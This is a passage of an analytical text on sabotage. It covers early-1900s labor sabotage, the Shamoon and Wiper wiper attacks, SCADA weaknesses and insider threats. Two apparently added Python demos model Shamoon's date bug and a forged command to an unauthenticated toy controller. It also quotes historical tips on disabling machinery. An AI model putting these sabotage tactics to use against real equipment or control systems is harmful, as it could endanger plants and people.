and keep strike-breakers from continuing work. Elizabeth Gurley Flynn,
a leading organizer for the Industrial Workers of the World, a large
union also known as the Wobblies, defined sabotage as “the withdrawal
of efficiency:”

Sabotage means either to slacken up and interfere with the quantity, or to 
botch in your skill and interfere with the quality of capitalist production 
or to give poor service ... And these three forms of sabotage—to affect the 
quality, the quantity and the service are aimed at affecting the profit of the 
employer. Sabotage is a means of striking at the employer’s profit for the 
purpose of forcing him into granting certain conditions, even as workingmen
strike for the same purpose of coercing him. It is simply another
form of coercion. 5

Some labor activists and syndicalists explicitly understood sabotage as 
a way to inflict physical damage against the oppressive machinery that 
made their work miserable or threatened the unskilled worker’s livelihood
altogether by making manual labor obsolete. Pouget quotes from
an article published in 1900, a few weeks ahead of an important workers’
congress in Paris. In it, the Bulletin de la bourse du travail de Montpellier
gives recommendations for sabotage:

If you are a mechanic, it’s very easy for you with two pence worth of 
ordinary powder, or even just sand, to stop your machine, to bring about 
a loss of time and a costly repair for your employer. If you are a joiner or 
a cabinet maker, what is more easy than to spoil a piece of furniture without
the employer knowing it and making him lose customers? 6

The pamphlet achieved some modest fame for its clever advice on 
how workers could cause accidents and damage without attribution: 
shop-assistants may drop fabrics onto dirty ground, garment workers 
may ignore faults in textiles; engineers may deliberately neglect oiling 
the moving parts of the machines they were supposed to maintain. 
Sabotage was historically understood as a coercive tactic directed against 
property, not against people. Even when it was directed merely against 
machines, the question of whether restive workers should try to destroy 
machinery or merely disable it for a limited period of time was controversial
given that the use of violence, even if only directed at machines,
was a matter of some dispute among syndicalists at the time. Delaying
production was one thing; destroying property was something else,
something that could have dire consequences, legally as well as politically.
In America, political opponents had accused the Industrial Workers
of the World, popularly known as the “Wobblies,” of relying mainly
on crude violence to achieve their goals. Some labor organizers therefore 
considered it necessary to distinguish between violence on the one hand 
and sabotage on the other. Arturo Giovannitti, a prominent Italian- 
American union leader and poet, argued for the latter in the foreword 
to the 1913 English translation of Pouget’s book Sabotage. Sabotage, 
Giovannitti wrote, was: 

Any skilful operation on the machinery of production intended not to 
destroy or render it defective, but only to disable it temporarily and to put 
it out of running condition in order to make impossible the work of scabs 
and thus to secure the complete and real stoppage of work during a strike. 7

Sabotage is this and nothing but this, he added, using the language of 
political activism rather than the language of scholarship, “It has nothing 
to do with violence, neither to life nor to property.” 8 

Such subtle differences made sense in theory. In practice it was often 
difficult to distinguish between permanent destruction and temporary 
disablement—for several reasons, two of which will serve to highlight 
the novelties of sabotage by cyber attack. The first is the difference 
between hardware and software. If temporarily interrupting a process 
required damaging hardware, then the line between violence and sabotage
is hard to draw. This is illustrated by an example from the early
twentieth century, when telecommunication installations became a
target of sabotage. Sabotage had to target hardware, pretty simply,
because software did not exist yet. During French postal and railway
strikes in 1909 and 1910, for instance, saboteurs cut signal wires and
tore down telegraph posts. Cutting a telegraph wire may have been
intended as temporary disablement, yet it also effectively destroyed property.
Distinguishing between violence and non-violence was also difficult
for a second reason: the dynamics of group confrontations. Again
the worker confrontations around the time of the First World War are
an instructive example: many union activists knew that situations where
striking workers squared off with the capitalist forces of the state could
turn violent. Vincent Saint John, a miner, a Wobbly, and one of America’s
most influential labor leaders, made this point explicit: “I don’t
mean to say that we advocate violence; but we won’t tell our members
to allow themselves to be shot down and beaten up like cattle. Violence
as a general rule is forced upon us.” 9 Such concern was not necessarily
unjustified. Strikes and worker demonstrations could easily intensify
into violent riots. A graphic example was the Grabow Riot of 7 July
1912, a violent confrontation between unionized Louisiana sawmill
workers and the Galloway Lumber Company, which left four men dead
and around fifty wounded. Pre-Internet-age sabotage, in short, easily 
escalated into violence against machines and, in groups, against people. 

Both of these difficulties largely disappear in an age of computer 
attack. Distinguishing violent from non-violent attacks becomes easier. 
Violence is more easily contained and avoided: by default, software 
attacks maliciously affect software and business processes—but damaging
hardware and mechanical industrial processes through software
attack has become far more difficult. The remit of non-violent cyber
attack, as a consequence, has widened: a well-crafted cyber attack that
destroys or damages data, although without interfering with physical
industrial processes, remains non-violent. The Shamoon attack against
Saudi Aramco of August 2012 is an ideal example. Neither hardware nor
humans were physically harmed. Yet, by allegedly wiping the hard disks
of 30,000 computers, the attack created vastly more delay and monetary
damage for Saudi Aramco than a minor act of sabotage against machinery
in one of Aramco’s plants. That may have been easier to fix and
conceal. The oil giant reportedly hired six specialized computer security
firms to help the forensic investigation and the post-attack cleanup.
Liam O Murchu was involved in Symantec’s research into the attack. “We
don’t normally see threats that are so destructive,” Murchu told Reuters,
“It’s probably been 10 years since we saw something so destructive.” 10
Non-violent cyber attacks, in short, may be more efficient, more damaging,
and more instrumental than violent attacks, whether executed
through cyberspace or not. 

Online attacks also made it easier, or possible in the first place, to 
isolate sabotage from volatile group dynamics. Online sabotage, if it 
relies on group participation at all, is highly unlikely to escalate into real 
bloodshed and street violence—activists and perpetrators of code-borne 
sabotage, after all, may not even be physically present on a street or 
anywhere else. Both of these dynamics are novel. And both will be illustrated
by a more detailed examination of recent cases that witnessed
serious acts of sabotage administered through cyber attack. 

A more granular and technical examination of the Shamoon attack is 
instructive. The initially mysterious outage in the then cyber-attack-ridden
Middle East occurred in the otherwise calm summer month of
August in 2012. This time the attack became known as “Shamoon,” 
again because the anti-virus researchers who analyzed the software chose 
this name. That name, curiously, was taken from a folder name in one 
of the malware’s strings, 

C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb 

Shamoon simply means “Simon” in Arabic. One initial and, as it 
turned out, wrong suspicion was that it could be related to the Sami 
Shamoon College of Engineering, Israel’s largest and most well-reputed 
engineering school. The malware came in the form of a small 900-kilobyte
file that included encrypted elements. It had three functional components:
a dropper, to install additional modules; a wiper, responsible
for deleting files; and a reporter, to relay details back to the software’s
handlers. After the small file was introduced into a target network, most
likely as an email attachment, it would spread via shared network
connections to other machines on the same network. The software’s
payload was designed to destroy data. It overwrote the segment of a hard
drive responsible for rebooting the system as well as partition tables and
most files with random data, including a small segment of an image that
allegedly shows a burning American flag. 11 As a result of the software’s
destructive capabilities, the US government’s computer emergency response
team pointed out that “an organization infected with the malware
could experience operational impacts including loss of intellectual property
and disruption of critical systems.” The US agency in charge of
responding to computer emergencies also pointed out that the software’s
destructive potential remained limited: “no evidence exists that Shamoon
specifically targets industrial control systems components or U.S.
government agencies.” 12 There is equally no evidence that the software 
succeeded in disrupting critical systems—and this is the case despite its 
initial success. 

A previously unknown entity, the “Cutting Sword of Justice,” claimed 
credit for the attack against Saudi Aramco by pasting a poorly crafted 
message on Pastebin, a platform used by hackers to dump raided data in 
simple text form. First the attackers made clear what their intention was, 
aligning themselves with anti-oppression rebels in the countries affected 
by the Arab Spring: 

We, behalf of an anti-oppression hacker group that have been fed up of 
crimes and atrocities taking place in various countries around the world, 
especially in the neighboring countries such as Syria, Bahrain, Yemen, 
Lebanon, Egypt and ..., and also of dual approach of the world community
to these nations, want to hit the main supporters of these disasters by
this action. 

One of the main supporters of this disasters [sic] is Al-Saud corrupt regime 
that sponsors such oppressive measures by using Muslims oil resources. 
Al-Saud is a partner in committing these crimes. It’s [sic] hands are infected
with the blood of innocent children and people.

With their motivation and their target set out, the Cutting Sword of 
Justice announced some initial action: 

In the first step, an action was performed against Aramco company, as the 
largest financial source for Al-Saud regime. In this step, we penetrated a 
system of Aramco company by using the hacked systems in several 
countries and then sended [sic] a malicious virus to destroy thirty thousand
computers networked in this company. The destruction operations
began on Wednesday, Aug 15, 2012 at 11:08 AM (Local time in Saudi 
Arabia) and will be completed within a few hours. 13 

This anonymous claim was most likely genuine. Symantec only learned
about the new malware after this message had been posted. The
security firm confirmed that the timing of 11:08 a.m. was hard-wired
into Shamoon, as announced on Pastebin. Two days later the hackers
followed up with a separate post, publishing thousands of IP addresses
which, they claimed, belonged to the infected computers. 14 Saudi
Aramco did not respond to those claims, but Symantec assumed that
the addresses did indeed belong to the Saudi oil producer. 15 Aramco
later confirmed that the number of infected computers was 30,000, as
claimed by the Cutting Sword of Justice. The attacks remained targeted,
with probably less than fifty separate infections worldwide, most
of them inconsequential. RasGas of Qatar, also one of the world’s 
largest exporters of natural gas, was the second victim and was more 
seriously affected. 

Shamoon was focused on the energy sector; it was designed to destroy 
data, and it even contained a reference to “wiper” in the above-quoted 
string. So was Shamoon in fact that mysterious Wiper? After all, like 
Saudi Arabia, the Iranian regime was highly unpopular with anti-government
government activists and rebels across the Arab world. The answer, 
however, is most likely “no.” Kaspersky Lab, which did the most detailed 
research into Wiper, pointed out that the deletion routine is different 
and that the hacker group’s attack against Saudi Aramco used different 
filenames for its drivers. Perhaps most notably, the politico-hackers 
made some programming errors, including a crude one. They wanted 
Shamoon to start thrashing Saudi files on 15 August 2012, 08:08 
UTC—but their date-checking routine contained a logical flaw: the 
software’s date-testing query would return the order to attack even when 
it should not, in any year after 2012 provided the month and time was 
before 15 August. February 2013, for instance, would therefore qualify 
as being before 15 August 2012. To the developers at Kaspersky Lab, 
this mistake was additional proof that Shamoon was a copy-cat attack 
by far less sophisticated hacktivists, and not a follow-on attack by the 
highly professional developers that had written Wiper or even Stuxnet; 
“experienced programmers would hardly be expected to mess up a date 
comparison routine,” wrote Dmitry Tarakanov, one of Kaspersky’s analysts. 16
It remains unclear precisely how Shamoon’s authors managed to
breach Saudi Aramco’s networks. 
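As an added illustration, not the malware’s own code (which this chapter does not reproduce), the constructed Python below shows the class of date-comparison error described above: a year check that only guards against earlier years, so that a later year falls through to the month and day tests as if it were still 2012. It sits beside the correct lexicographic comparison and a small sweep of the kind an analyst would run to enumerate the misclassified days; the exact shape of the buggy routine is an assumption.

```python
from datetime import datetime, timedelta

# Trigger moment quoted in the chapter: 15 August 2012, 08:08 UTC.
TRIGGER = (2012, 8, 15, 8, 8)


def buggy_before_trigger(y, m, d, hh, mm):
    """Constructed example of the flaw class: the year is only tested for
    being *earlier* than 2012, so 2013, 2014, ... fall through to the
    month/day/time checks as though the year were 2012."""
    if y < 2012:
        return True            # earlier year: correctly "before trigger"
    # BUG: the guard 'if y > 2012: return False' is missing here.
    if m < 8:
        return True            # February 2013 lands here and is called "before"
    if m > 8:
        return False
    if d < 15:
        return True
    if d > 15:
        return False
    return (hh, mm) < (8, 8)   # same day: compare the time of day


def correct_before_trigger(y, m, d, hh, mm):
    """Tuple comparison settles the most significant field (the year) first,
    which is the behaviour the field-by-field version fails to reproduce."""
    return (y, m, d, hh, mm) < TRIGGER


def disagreements(start_iso, end_iso):
    """Walk every day at 00:00 from start to end (inclusive, ISO date strings)
    and return the dates on which the two routines give different answers.
    A sweep like this confirms a suspected comparison bug without having to
    reason about every branch by hand."""
    day = datetime.fromisoformat(start_iso)
    end = datetime.fromisoformat(end_iso)
    bad = []
    while day <= end:
        args = (day.year, day.month, day.day, day.hour, day.minute)
        if buggy_before_trigger(*args) != correct_before_trigger(*args):
            bad.append(day.date().isoformat())
        day += timedelta(days=1)
    return bad


if __name__ == "__main__":
    wrong = disagreements("2012-01-01", "2013-12-31")
    # Every day from 1 January to 15 August 2013 is misclassified as "before".
    print(f"{len(wrong)} misclassified days, first {wrong[0]}, last {wrong[-1]}")
```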

Another case of Middle Eastern cyber sabotage is equally instructive. 
At the end of April 2012, a new and rather mysterious piece of malware 
appeared. Alireza Nikzad, a spokesman for the Iranian oil ministry, 
confirmed that an attack on data systems had taken place. Probably as a 
precaution, Iran took its main Persian Gulf oil terminals off the Internet.
But Nikzad stressed that the attackers had failed to damage or destroy
data:

This cyber attack has not damaged the main data of the oil ministry and
the National Iranian Oil Company (NIOC) since the general servers are
separate from the main servers, even their cables are not linked to each
other and are not linked to internet service ... We have a backup from all
our main or secondary data, and there is no problem in this regard. 17

The malware posed an unusual problem to its victims and those 
trying to understand the new threat: the software was designed to delete 
not only files on the attacked computer networks, but also itself and all 
traces of the attack. Consequently, no samples of the malware had been 
available for analysis. For months, leading anti-virus companies were 
unable to find Wiper, prompting some outside observers to question the 
veracity of news reports about yet another Iran-bashing cyber attack. 
But Kaspersky Lab, the Russian software security firm that seems to be 
especially popular in countries that harbor suspicions against private 
American security companies, established some facts. The Russian firm 
was able to obtain “dozens” of hard drive images from computer systems 
that had been attacked by Wiper, presumably from some of its Iranian 
customers, either directly or with help from Russian state intelligence. 
A hard drive image is an exact copy of an entire hard drive at a given 
moment. Kaspersky Lab was able to confirm that the attack indeed took 
place in the last ten days of April 2012. 18 The designers of the attack had 
two priorities: the first was destroying data as efficiently as possible. 
Deleting the full contents of a large storage device, such as a hard drive 
several hundred gigabytes in size, can take a long time, up to several 
hours, depending on the capacity of the processor and other technical 
characteristics. So the attackers decided to craft a wiping algorithm that 
prioritized speed. 

The attackers’ second priority was stealth. Wiper’s creators, Kaspersky 
Lab pointed out, “were extremely careful to destroy absolutely every 
single piece of data which could be used to trace the incidents.” Yet in 
some cases traces did remain. Some of the attacked systems were able to 
recover a copy of the Windows registry hives, parts of a computer’s 
underlying master database that are saved in separate files on the hard 
disk. On some of the systems analyzed by Kaspersky Lab, Wiper deleted 
all .PNF files in a specific Windows folder where important system files 
are stored (the INF folder). It deleted those files with a higher priority 
than other files on the system. The researchers suspected that Wiper kept 
its own main body in that folder as an encrypted .PNF file. Other
sophisticated cyber attacks, notably Stuxnet and Duqu, also stored most
of their primary files in PNF, something that is uncommon for malware.
The rationale, the Russian experts reasoned, was that Wiper would wipe
itself and all its malware components first, and only then proceed to
delete other targeted files, including the system files that would ultimately
crash the system. If Wiper had started deleting system files randomly,
the chances would be significant that it would “forget” to delete itself on
some machines before the operating system crashed, thus conserving all
non-deleted files on the hard drive, leaving forensic traces of the malware
itself behind. But this particular malware was so expertly written that no
data survived in each instance where it was activated. Although Kaspersky
Lab has seen traces of infections, the malware itself remains
unknown, as is the software’s targeting priority. Who the attacker was, 
and how many victims got hit, remains a matter of speculation. 

Both Shamoon and Wiper had one critical limitation. They targeted 
large energy companies, companies that move vast quantities of oil and 
gas. Yet production and logistics remained unaffected by the attacks. The 
business network was hit, but not the industrial control network that 
made sure the crucial combustible fossil fuel was still pumped out of the 
ground and into pipelines and tankers. In December 2012, Saudi Aramco’s
forensic investigation into Shamoon brought to light the fact that
the attackers had tried for a full month to disrupt the industrial control 
systems that manage the company’s oil production, “The main target in 
this attack was to stop the flow of oil and gas to local and international 
markets,” said Abdullah al-Saadan, the firm’s vice-president for corporate 
planning. 19 The attack on the SCADA network was unsuccessful. More 
serious sabotage has to overcome this limitation. 

Successful attacks on industrial control systems that cause physical 
damage are very rare, but real. Sabotage, which dates back to industrial 
confrontations in the late nineteenth century, is again going industrial 
in the digitized twenty-first century: today’s most formidable targets are 
industrial control systems, also known as systems in charge of Supervisory
Control and Data Acquisition. Such systems are used in power
plants, the electrical grid, refineries, pipelines, water and wastewater
plants, trains, underground transportation, traffic lights, heat and
lighting in office buildings and hospitals, elevators, and many other
physical processes. An alternative abbreviation that is sometimes used is
DCS, which stands for Distributed Control Systems. DCS tend to be
used to control processes in smaller geographical areas, such as factory
floors, whereas SCADA systems can span entire regions, for instance in
the case of pipelines or transportation grids. Both are subsets of Industrial
Control Systems, or ICS. Attacking an industrial control system is
the most probable way for a computer attack to create physical damage 
and indirectly injure or kill people. 

Although “Supervisory control and data acquisition” sounds complicated,
the earliest control networks were actually made up of a simple
monitoring device, say a meter with a switch, and remote sensors and 
actuators: if the temperature in a factory tank a mile away dropped 
below 100 degrees, for instance, the operator would remotely switch on 
the boiler. As industrial production became more complex, so did the 
computerized control networks. Yet most industrial control systems have 
basic design features in common, be they oil refineries, electrical power 
stations, steel plants, chemical factories, or water utilities. To understand 
the potential of sabotage against SCADA systems, some of these basics 
are important. 

The first part, at least from the point of view of the operator, is the so-called human-machine interface, often abbreviated as HMI. The community of engineers specialized in SCADA systems commonly uses shorthand, and their analysis is hard to penetrate without knowing at least some of the jargon. Plant operators or maintenance personnel would mostly control the system through that interface. In modern systems the HMI is in effect a large screen showing a mimic of a plant or large apparatus, with small images perhaps showing pipes and joints and tanks, equipped with bright lights and small meters that would allow the operator to get readings on critical values, such as pressures and speeds. If a certain parameter requires action, a light may start blinking red or a meter may indicate a potential problem. A second component is the supervisory computer system. This is the system’s brain. The supervisory computer is able to gather data and respond by sending commands back to field devices to control the process. Field devices may be on the plant floor, or actually and quite literally in the field, such as a pipeline network that spans large distances outdoors. In simpler systems, so-called Programmable Logic Controllers (PLCs) can replace a more complex supervisory computer system. Control systems and PLCs are so-called “master devices.” The third set of components are Remote Terminal (or Telemetry) Units, known as RTUs in the industry jargon. These are “slave devices” which carry out orders from their masters. These devices would sit close to motors or valves that need to be controlled. RTUs act in both directions; they transmit sensor data to the control system and transmit orders from the supervisory system to remote motors and valves.

All SCADA systems require a communication infrastructure. This communication infrastructure can be complex and costly, especially for systems that are geographically spread out over a wider area. Distances can be significant in the case of pipeline networks, water grids, and large chemical plants. Some industrial plants have to withstand extreme temperatures generated in the production process, electro-magnetic radiation, or rugged environmental conditions. The requirements for the communication hardware are not only rough but also diverse, because the industrial applications are so diverse. The companies that produce components for SCADA networks have therefore developed approximately 200 proprietary protocols, often individually. For a long time, this diverse and somewhat chaotic situation made it difficult for attackers to penetrate and understand a particular control network. A SCADA network is often connected to a company’s business network through special gateways. Enabling data-links between the business network and automated production processes enables increased efficiency, better supply management, and other benefits. Such gateways provide an interface between IP-based networks, such as a company’s business network or the open Internet, and the simpler, fieldbus protocol-based SCADA network that controls field devices. 20 Sometimes, especially in large networks like electricity grids, there may be unexpected links to the outside world such as phone connections or open channels for radio communication. SCADA networks are often old legacy systems, and as a result of complexity and staff turnover no single person may be able to understand the full reaches of the network. A large but ultimately unknown number of SCADA systems are connected to the Internet, also possibly without their operators’ awareness. 21

Three trends are making SCADA systems potentially more vulnerable. The first trend is standardization in communication protocols. Increasing efficiency at minimum costs also creates pressures for the operators of control systems. In a dynamic that is comparable to open-source software, open protocol standards create significant gains in efficiency. But they also make the systems more vulnerable overall. “The open standards make it very easy for attackers to gain in-depth knowledge about the working of these SCADA networks,” one research paper pointed out in 2006. 22 One possibility, for instance, is that an attacker, once the network is penetrated, could observe and “sniff” communications on a network. Once malicious actors have learned more about the data and control commands, they could utilize their new knowledge to tamper with the operation. In some ways this is precisely what Stuxnet did.
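The sniff-then-tamper risk that an open but unauthenticated master-to-RTU protocol creates, and the usual mitigation (a message authentication tag plus a sequence number on every command frame), can be shown with a constructed toy frame format. This is an added example in Python, not code from the book or from any real vendor protocol; the frame layout, unit id 7, register 0x10 and the shared key are all constructed for illustration.

```python
import hashlib
import hmac
import struct

# Constructed toy "fieldbus" command frame (not any real vendor protocol):
#   unit id (1 byte) | function (1 byte: 1 = read, 2 = write) | register (2) | value (2)
def encode_plain(unit, func, reg, value):
    return struct.pack(">BBHH", unit, func, reg, value)

def decode_plain(frame):
    unit, func, reg, value = struct.unpack(">BBHH", frame)
    return {"unit": unit, "func": func, "reg": reg, "value": value}

class PlainRTU:
    """Legacy-style slave device: obeys any well-formed frame addressed to it."""
    def __init__(self, unit):
        self.unit = unit
        self.registers = {0x10: 0}   # constructed: 0x10 = pump run (1) / stop (0)

    def handle(self, frame):
        msg = decode_plain(frame)
        if msg["unit"] != self.unit:
            return "ignored"
        if msg["func"] == 2:
            self.registers[msg["reg"]] = msg["value"]
            return "written"
        if msg["func"] == 1:
            return self.registers.get(msg["reg"], 0)
        return "bad-func"

# Hardened variant: same payload, prefixed with a sequence number and followed by
# a truncated HMAC-SHA256 tag under a key shared by master and RTU. A party that
# can only observe the wire still reads every frame, but cannot produce a valid
# tag for a new frame and cannot resend an old one.
TAG_LEN = 16
BODY_FMT = ">IBBHH"   # seq (4) | unit | func | reg | value  = 10 bytes

def encode_auth(key, seq, unit, func, reg, value):
    body = struct.pack(BODY_FMT, seq, unit, func, reg, value)
    tag = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    return body + tag

class AuthRTU:
    """Slave device that checks the tag and rejects stale sequence numbers."""
    def __init__(self, unit, key):
        self.unit, self.key = unit, key
        self.registers = {0x10: 0}
        self.last_seq = 0

    def handle(self, frame):
        if len(frame) != struct.calcsize(BODY_FMT) + TAG_LEN:
            return "rejected"
        body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return "rejected"            # forged or modified in transit
        seq, unit, func, reg, value = struct.unpack(BODY_FMT, body)
        if seq <= self.last_seq:
            return "replayed"            # an old, genuine frame resent
        self.last_seq = seq
        if unit != self.unit:
            return "ignored"
        if func == 2:
            self.registers[reg] = value
            return "written"
        if func == 1:
            return self.registers.get(reg, 0)
        return "bad-func"

def demo():
    key = b"constructed-shared-key"     # constructed; real deployments provision per-device keys
    plain = PlainRTU(unit=7)
    auth = AuthRTU(unit=7, key=key)

    # The legitimate master starts the pump (writes 1 to register 0x10) on both devices.
    plain_first = plain.handle(encode_plain(7, 2, 0x10, 1))
    auth_first = auth.handle(encode_auth(key, 1, 7, 2, 0x10, 1))

    # A frame built by someone who has only watched the wire (no key): the plain
    # device cannot distinguish it from the master's own traffic.
    plain_forged = plain.handle(encode_plain(7, 2, 0x10, 0))
    auth_forged = auth.handle(struct.pack(BODY_FMT, 2, 7, 2, 0x10, 0) + bytes(TAG_LEN))
    # Resending the master's genuine first frame is caught by the sequence check.
    auth_replay = auth.handle(encode_auth(key, 1, 7, 2, 0x10, 1))

    return {
        "plain_first": plain_first, "auth_first": auth_first,
        "plain_forged": plain_forged, "auth_forged": auth_forged,
        "auth_replay": auth_replay,
        "plain_reg": plain.registers[0x10], "auth_reg": auth.registers[0x10],
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The plain device ends with its pump register overwritten by a frame no master sent; the authenticated device keeps the master’s value, because a frame without a valid tag is rejected and a resent genuine frame is refused on its sequence number. Key provisioning, key rotation and handling of counter resets after a device reboot are left out of the toy, and are exactly the parts that make retrofitting authentication onto legacy fieldbus equipment hard in practice.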

The second trend that is making industrial control systems more vulnerable to outside attack is an increase in connectivity. Technically, SCADA communication systems used to be organized as point-to-multipoint “serial” communications over various channels, for example phone lines or private radio systems. But increasingly the communication within a SCADA system relies on Internet Protocols. This means that terminal servers are increasingly set up to convert serial asynchronous data (i.e. bit- or byte-oriented data) into IP or “frame relay packets” for transmission in upgraded systems. This change brings many benefits. Maintenance of devices becomes easier when these devices are easy to connect to, both from a company’s business network, which connects air-conditioned office space in headquarters with noisy factory floors, and from the wider Internet, which is often the bridge to contractors and complex supply chains. This trend is amplified by the push for smart grids, which can save money by automatically moving peak production to times of cheap energy prices. Telvent is a leading industrial automation company, valued at $2bn, and a subsidiary of the giant Schneider Electric, a French international firm that employs 130,000 people worldwide. One of Telvent’s main smart grid products, OASyS, is specifically designed to bridge the gap between an energy firm’s enterprise network and its activities in the field that are run by older legacy systems. In the fall of 2012, Telvent reported that attackers had installed malicious software and stolen project files related to OASyS. 23 The intruders were likely to have been members of the possibly Shanghai-based “Comment Group,” a large-scale cyber espionage operation allegedly linked to the Third Department of the People’s Liberation Army of China. 24

A third trend is more visibility. Search technology has made many things far easier to find, and this includes previously hard to get manuals from PLC manufacturers which may occasionally even contain hard-coded login credentials. But the biggest change in visibility is probably due to one private programmer. In 2009, the then 26-year-old John Matherly started operating a search engine for all sorts of devices connected to the Internet. Shodanhq.com boasts of listing: “Webcams. Routers. Power Plants. iPhones. Wind Turbines. Refrigerators. VoIP Phones.” 25 The platform has been dubbed the Google for hackers. Its search functionality offers to find computers based on software, geography, operating system, IP address, and other variables. Shodan’s crawlers scan the Internet for the ports usually associated with mainstream protocols such as HTTP, FTP, SSH, and Telnet. On 28 October 2010, the US Department of Homeland Security warned that the resources to identify control systems openly connected to the Internet have been greatly reduced. The ICS-CERT alert pointed out that there was an “increased risk” posed by Shodan’s growing database. 26 In June of the following year, Eireann Leverett, a computer science student at Cambridge University, finished his MPhil dissertation. Using Shodan, Leverett had found and mapped 10,358 Internet-facing industrial control systems, although it remained unclear how many of them were in working condition. Yet, remarkably, only 17 per cent of all systems, Leverett found, required a login authentication. When Leverett presented his findings at the S4 conference, a special event for control system specialists, many were surprised and even shocked. Some vendors started using Shodan to notify customers whose systems they would find online. One attendee who worked for Schweitzer, a PLC manufacturer, admitted the ignorance of some operators: “At least one customer told us ‘We didn’t even know it was attached’,” he told Wired magazine. 27

Yet the picture would not be complete without acknowledging the counter-trends. SCADA systems are not only becoming more vulnerable, but are also subject to several trends that make them less vulnerable. The question of security becomes a question of balance. And it may only be possible to answer that question in a case-by-case analysis. For the following three reasons industrial control systems may be getting safer, not more vulnerable. These reasons may also help explain why the world, by the end of 2012, had still not witnessed a destructive cyber attack that actually injured or killed human beings.

The first reason is closely related to more visibility: improved oversight and red-teaming. A red team, an expression common in national defense as well as in computer security, refers to a group of mock adversaries with the task of trying to test and expose an organization’s or a plan’s flaws and weaknesses. On 12 December 2011, for instance, a 29-year-old independent European researcher, Ruben Santamarta, blogged 28 about his discovery of a flaw in the firmware of one of Schneider’s programmable logic controllers, more precisely the so-called NOE 771 module. The module contained at least fourteen hard-coded passwords, some of which were apparently published in support manuals. Before Santamarta published the vulnerabilities, he had informed the US government’s computer emergency response team in charge of control systems. ICS-CERT promptly reacted. On the same day, Homeland Security published an alert pointing to the new vulnerability, and coordinated with Schneider Electric “to develop mitigations.” 29 Santamarta’s hack effectively resulted in considerable pressure on Schneider to fix the problem. A better-known white-hat PLC hacker is Dillon Beresford. White-hat is jargon for ethical hackers whose goal is to improve security, as opposed to black-hats who seek to exploit security flaws. Beresford, a researcher with little previous experience in control systems, uncovered critical vulnerabilities in the Siemens Simatic S7 programmable logic controllers, a widely used product. 30 The security analyst at NSS Labs gained recognition among control system experts when Siemens and the US Department of Homeland Security requested that he cancel his presentation on newly discovered Siemens S7 vulnerabilities scheduled at a hacker conference in Dallas in May 2011, TakeDownCon. 31 A number of harmless but high-profile SCADA breaches in the past years have also contributed to a sense of alarm in the control system community. A third example is Justin Clarke’s exposures of vulnerabilities in RuggedCom’s products, which were also highlighted by an ICS-CERT alert. 32 The pressure on the vendors kept mounting.

The second reason, partly a result of the first, is slowly improving vendor security. There are dozens of companies that produce Programmable Logic Controllers, but the worldwide market is dominated by only a few companies, with Siemens covering more than 30 per cent, Rockwell Automation just over 20 per cent, Mitsubishi at about 14 per cent, and Schneider Electric just under 10 per cent. Specific applications tend to be in the hands of specific vendors. Refineries, for instance, use mostly Honeywell, Emerson, and Yokogawa products. 33 Some of these manufacturers have a highly problematic track record in fixing flaws. Various critics had been pointing out for years, for instance, that Siemens had failed to remove critical vulnerabilities in its Simatic Step 7 and Simatic PCS 7 software. A bug in the software enabled attackers to inject a malicious dynamic-link library, a .dll file, into an unprotected Step 7 project folder. Stuxnet exploited this type of flaw to destroy the centrifuges in Natanz. Among the most prominent critics were Ralph Langner, a German engineer and early Stuxnet detective, 34 as well as Dale Peterson’s team at Digital Bond, a leading consultancy on industrial control systems. 35 Digital Bond runs an active blog and one of the industry’s most highly reputed conferences, the yearly S4 conference in Miami Beach. Peterson is feared by many in the control system industry for publishing far too many unpleasant details on systems that are insecure by design. But, he says, “we publish probably only about 10 per cent of what we find.” 36 After years of pressure, Siemens and other PLC vendors seem to have started responding and improving the security of their products, albeit still far too slowly.

The final reason is continued, and possibly increasing, obscurity. Despite open protocols, more connectivity, and better documentation through a new search engine focused on hidden Internet-facing devices, the obscurity of systems remains a huge hurdle for successful outside attacks (but not for inside attackers). Merely gaining access to a system and even sniffing it out may not be enough to prepare a sophisticated attack, especially in highly complex industrial production processes. “You don’t have the human machine interface so you don’t really know what the PLC is plugged into,” explained Reid Wightman, a well-known expert on industrial control systems. “I really don’t know if the [device] is a release valve, an input valve, or a lightbulb.” Superb intelligence is needed for success, and possibly even test-flying the attack agent in an experimental setup that resembles the original target as closely as possible. Something like this is hard to design, as Stuxnet demonstrated. As production systems become more complex, and often more bespoke, their obscurity may increase rather than decrease.

The most effective saboteur has always been the insider—a feature that remains as true in the twenty-first century as it did in the 1910s. If anything, computer sabotage has empowered the outsider vis-à-vis the inside threat, although the most violent acts of computer sabotage remain inside jobs. The reason is simple. The best-placed person to damage a machine is the engineer who built it or maintains it, the manager who designed and runs a production process, or the IT administrator who adapted or installed a software solution. It therefore comes as no surprise that sabotage manuals tend to be written largely for insiders, and this insight seems to apply to French anarchists as well as to American spies: in 1900, the bulletin of Montpellier’s Bourse de Travail was meant to be applied on the job, by the very factory workers best placed to monkeywrench the appliances of their despised capitalist bosses. In 1944, the OSS’s Simple Sabotage Field Manual also hoped to assist privy personnel in devising methods that would cause dithering, delay, distress, and destruction, from telegraph operators to railway engineers. In the context of cyber attacks, the insider threat is especially pertinent for complex SCADA systems. Engineers and administrators who work for a power plant or utility company know the systems best. They have the high degree of process knowledge that is required to mount an effective attack against bespoke legacy systems. If there is a risk of somebody secretly installing “logic bombs” that could be timed or activated from afar, it is the insider that poses the greatest risk.

The saboteurs’ long-standing emphasis on inside knowledge has a problematic flipside, both for those trying to sabotage and for those trying to defend against sabotage: the most effective acts of industrial incapacitation require supreme access, supreme skill, and supreme intelligence regarding the target. As systems become more complex and arcane, the knowledge required to fiddle with them also becomes more complex and arcane. The result is a tenuous security advantage for the defender. Security engineers in computer science even have a technical term for this double-edged sword, “security-by-obscurity.” “There is no security-by-obscurity” is a popular pejorative phrase among computer scientists. It goes back to Auguste Kerckhoffs, a nineteenth-century Parisian cryptographer and linguist. A core assumption broadly held in cryptography, known as Kerckhoffs’s Principle, is widely considered incompatible with the idea of securing a system by obscuring knowledge about how to attack it. 37 Kerckhoffs’s idea holds that a cryptosystem must be secure even if that system’s design—except the encryption key—is public knowledge. It is therefore no surprise that the notion of security-by-obscurity is looked down upon by leading cryptographers. Yet the relationship between security and obscurity is more complicated outside the narrow remit of cryptographers. 38 For engineers in charge of industrial control systems, 